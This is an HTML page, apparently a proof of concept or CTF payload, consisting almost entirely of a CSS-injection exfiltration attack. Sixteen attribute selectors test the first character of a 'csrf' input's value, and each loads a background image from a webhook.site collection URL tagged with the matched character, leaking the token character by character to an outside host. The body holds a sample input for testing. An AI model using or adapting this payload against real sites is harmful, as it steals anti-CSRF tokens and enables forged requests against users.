<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
  <style>
    input[name=csrf][value^=generate_css0] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?0);
    }

    input[name=csrf][value^=generate_css1] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?1);
    }

    input[name=csrf][value^=generate_css2] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?2);
    }

    input[name=csrf][value^=generate_css3] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?3);
    }

    input[name=csrf][value^=generate_css4] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?4);
    }

    input[name=csrf][value^=generate_css5] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?5);
    }

    input[name=csrf][value^=generate_css6] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?6);
    }

    input[name=csrf][value^=generate_css7] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?7);
    }

    input[name=csrf][value^=generate_css8] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?8);
    }

    input[name=csrf][value^=generate_css9] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?9);
    }

    input[name=csrf][value^=generate_cssa] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?a);
    }

    input[name=csrf][value^=generate_cssb] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?b);
    }

    input[name=csrf][value^=generate_cssc] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?c);
    }

    input[name=csrf][value^=generate_cssd] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?d);
    }

    input[name=csrf][value^=generate_csse] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?e);
    }

    input[name=csrf][value^=generate_cssf] {
      background-image: url(https://webhook.site/0527f2e4-9001-46ad-bf0c-45744f062a2a?f);
    }
  </style>
</head>

<body>

  <input name="csrf" value="generate_cssfdadadadadda">
  </input>

</body>

</html>